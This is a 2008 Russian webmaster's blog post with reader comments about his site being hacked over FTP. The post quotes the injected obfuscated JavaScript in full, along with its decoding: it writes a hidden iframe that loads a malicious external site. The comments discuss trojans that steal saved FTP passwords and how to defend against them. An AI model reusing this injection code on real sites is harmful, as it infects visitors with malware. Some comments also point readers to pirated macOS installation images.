13 апреля 2008 в 22:39
сегодня вдруг обнаружил что сайт не работает. какая-то (самоцензура) залила через фтп вот такую хрень (без знаков подчеркивания 
):
<_Script>
<_!--
var d=document;
eval( unescape( "%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%7b%20%76%61%72%20%69%20%3d%20%30%3b%77%68%69%6c%65%28%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%2e%6c%65%6e%67%74%68%29%7b%76%61%72%20%65%6c%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%5b%69%5d%3b%69%66%28%20%28%65%6c%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%2e%77%69%64%74%68%3c%35%20&&%20%65%6c%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%2e%6e%61%6d%65%21%3d%27%63%31%27%20%29%20%7b%65%6c%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%29%3b%7d%20%65%6c%73%65%20%69%2b%2b%3b%7d%7d%63%68%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%3b%0d%0a%69%66%20%28%21%6d%79%69%61%29%20%7b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%32%36%38%38%31%29%2b%27%38%39%31%33%33%61%36%39%64%61%64%5c%27%20%77%69%64%74%68%3d%37%30%31%20%68%65%69%67%68%74%3d%31%38%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c1439772935;
//-->
<_/Script><_script>check_content()<_/script>
%% в вольном переводе означают:
function check_content(){ var i = 0;while(document.getElementsByTagName('iframe').length){var el = document.getElementsByTagName('iframe')[i];if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c1' ) {el.parentNode.removeChild(el);} else i++;}}check_content(); if (!myia) { d.write('http://macat.org/'http://my-page-de.info/in.cgi?2&'+Math.round(Math.random()*126881)+'89133a69dad\'');}var myia=true;
там Java/ClassLoader.AP троян
покоцаны:
httpdocs/: index.php
httpsdocs/: index.html
и 13 файлов error_docs/
судя по логам перезаливка была на автоматическом режиме
все пароли поменял, все перевернул 
обидно блин
Комментарии
бывает....
фтп взломали
наверно тотал командером пользовался?
пользовал FAR
пока заблокировал диапазон айпи фаерволом. подумываю как бы отловить, подскажите ссылкой софтину актуальную?
Проблемы 2 дырки на сервере(Drupal) или провайдере или на локальной машине(вирусняк).
1) Логи на провайдере как, когда и куда залили. Права на файлы. Душевный разговор с провайдером.
2) AVZ (в писк) и антивирус. Фаервол не всегда спасает(не панацея)...
-
Какие альтернативы Тоталу? Как из тотала и на каком моменте пароли могут уйти? (при варианте что нет фаервола)
У меня фаервол/антивирь Панда. вполне хороша, но вот только как ее расковырять не знаю. может кто имеет в этом опыт?
Альтернатива - FAR.
Кейлогер, червяк - полно случаев...
Посмотрите на систему в AVZ
тотал командер хранит пароли в открытом виде гдето в папке виндоус. Злоумышленник получил доступ к вашей машине и заполучил пароли фтп (скорей всего)
Избавление: сменить пароли, исопльзовать для работы с фтп предназначенные для этого программы (smartFTP, CuteFTP)
Споймал троян своей локальной рабочей машиной на каком либо из сайтов во время веб-серфинга. Год назад имел аналогичную проблему ( http://www.drupal.ru/node/5735 ). Троян запускается скриптом из другого сайта загружает исполнительный модуль вируса, тырит все личные эккаунтовые данные из абсолютного большинства пользуемых у нас программ (аутлук, аутлукэкспрес, бат, эксплорер, IE, фар, командер, флешфхп, файрфокс, т.д. и т.п.) и отсылает их пхп-шной почтой по специальному адресу. (Тогда у меня стоял аутпост и хваленый нод32 - дигер схавал их без напряжения и не подавился). Некоторые трояны такого типа после отработки могут себя удалять (так что антивирус уже ничего не найдет), другие втискиваются в реестр в... раздел файрвола. Так что менять нужно не только пароли фтп, а абсолютно все пароли на всех эккаунтах (фтп, почтовых, регистрационных сайтов, т.д. и т.п.) у меня им было около двух сотен на смену всего этого ушло около трех недель.
Спокойно жить начал после того, как купил и поставил Касперского (AVK) дополнительно к Аутпосту (нод32 выкинул наф...). (Правда, пришлось предварительно сменить машину на двухядерную, дабы касперу мощи хватало и другим оставалось). С тех пор неоднократно обнаруживались инфицирования даже вполне приличных сайтов...
И ещё. Пароли наиболее важных эккаунтов теперь хранятся в текстовом файле и вводятся вручную при инициализации (кроме почты и несущественных регистраций на сайтах).
Такие пирожки с котятами... Друпал здесь стопудово не причем.
Pozniy откуда информация что инфу могут украть даже из Far ?
Ну раз пользуетесь Windows-ом, то сами себе злобный Буратино.
Для заливки контента юзайте winscp
Возможности программы:
* Графический интерфейс
* Интерфейс переведён на несколько языков
* Интеграция с ОС Windows (drag&drop, поддержка схем URL, ярлыки)
* Все основные файловые операции
* Поддержка протоколов SFTP и SCP поверх как SSH-1, так и SSH-2
* Автоматизация при помощи скриптов и интерфейса командной строки
* Синхронизация папок по нескольким автоматическим и полуавтоматическим алгоритмам
* Встроенный текстовый редактор
* Поддержка авторизации по паролю, открытым ключом, Керберос (GSS) и keyboard-interactive
* Интеграция с Pageant (PuTTY Agent) для поддержки авторизации по открытым ключам
* Два пользовательских интерфейса: как в проводнике Windows Explorer и как в Norton Commander
* Возможность сохранять настройки соединений.
* Возможность работы с использованием файла конфигурации вместо реестра, что удобно при запуске с переносных носителей.
Любой широко распространённый ftp-клиент подвержен атакам троянских приложений (far, cutftp, total commander etc.).
Крайне рекомендую использовать SSH-протокол, и RSA-ключи для подтверждения подлинности с подтверждением с использованием ключевой фразы.
Например, может помочь Far + WinSCP FAR Plugin, собственно WinSCP, и, конечно, в довесок - Putty + PuTTYgen + PSCP + Pageant.
Жизнь без вирусов и антивирусных тормозов = MAC OSX (на PC) для графики и web-серфинга + WIN XP (с начисто отрубленной сетью) для остального.
Рекомендую. За несколько лет активной работы в сети ни одного вируса или трояна. Варезные и прочие нашпигованные вирусняком сайты юзаю - ежедневно и по-многу. Включая те, которые google помечает как "Опасные для Вашего компьютера".
Ссылкой не поделитесь на MAC на PC?
Стоит нормальная рабочая нода32, ни одного вируса сам своей машинкой не схряпал в течении уже более 2-х лет. При ентом специально серфил потенциально опасные сайты осликом - никаких проблем. Те же кто пользуются другими решениями иль базы постоянно не обновляют постоянно натыкаются на злостное кол-во вирусяк.
Ежели машинка уже больная, то поможет только AVZ+ virusinfo ( ежели совсем жесткая бяка).
З.Ы. Постоянные споры об антивирях чессна достали, зашел на офф. сайт ноды скачал инфу о тестах и сравнениях с другими антивирями и всем споршикам даю почитать перед дискуссией
>vrazbros: Pozniy откуда информация что инфу могут украть даже из Far ?
Из базы данных на этот тип вируса (который был у меня) Каспера. А что в Far такого волшебного? Вирус писали люди грамотные и "из местных", специально заточен на популярные сервисные программы рунетовских вебмастеров.
PVasili,
охотно, (сорри за офтоп):
http://forum.insanelymac.com/index.php?showforum=157
здесь есть все.
У меня стоит Leo4All. Пошел сразу и без танцев с бубном. Функциональность не хуже чем на моем же Mac Mini (разве что нет пульта:)), а вот скорость на intel8400 и 8800gts - просто зашкаливает! Только что вышла новая версия другой сборки - Kalyway v8. Еще не робовал, предыдущая (v7) тоже встала сразу, но понравилась меньше Leo4All.
Образ установочного диска 4,38 Гб ищите на торрентах.
создайте здесь в своём блоге отдельную запись про MacOS X, может быть интересно.
Мне, как разработчику, нельзя пока уходить с Windows Vista -мне нужно тестирование Windows Vista Gadgets и т.п. like .NET FW.
Меня лично всякие вирусы не донимают, это проблема пользователелей иных классов, да и Unix у меня идёт одним кликом
http://andlinux.org/
кстати, крайне рекомендую вместо denwer.
а я уже 5 лет не использую антивирусы и фаерволы. и сижу на винде. надеюсь не сглажу ничего.
пользуюсь Оутпост+ Filezilla + Опера - пока ни разу FTP-пароли не пёрли, в Тотале пароли хранить нельзя - это уже дети знают
Есть трояны, и немало, которые знакомы с хранением паролей в Опере
Храните пароли в мозгах.
100% защита от троянов (если только вы во сне не разговариваете).
В TotalCommander есть плагин для SSH.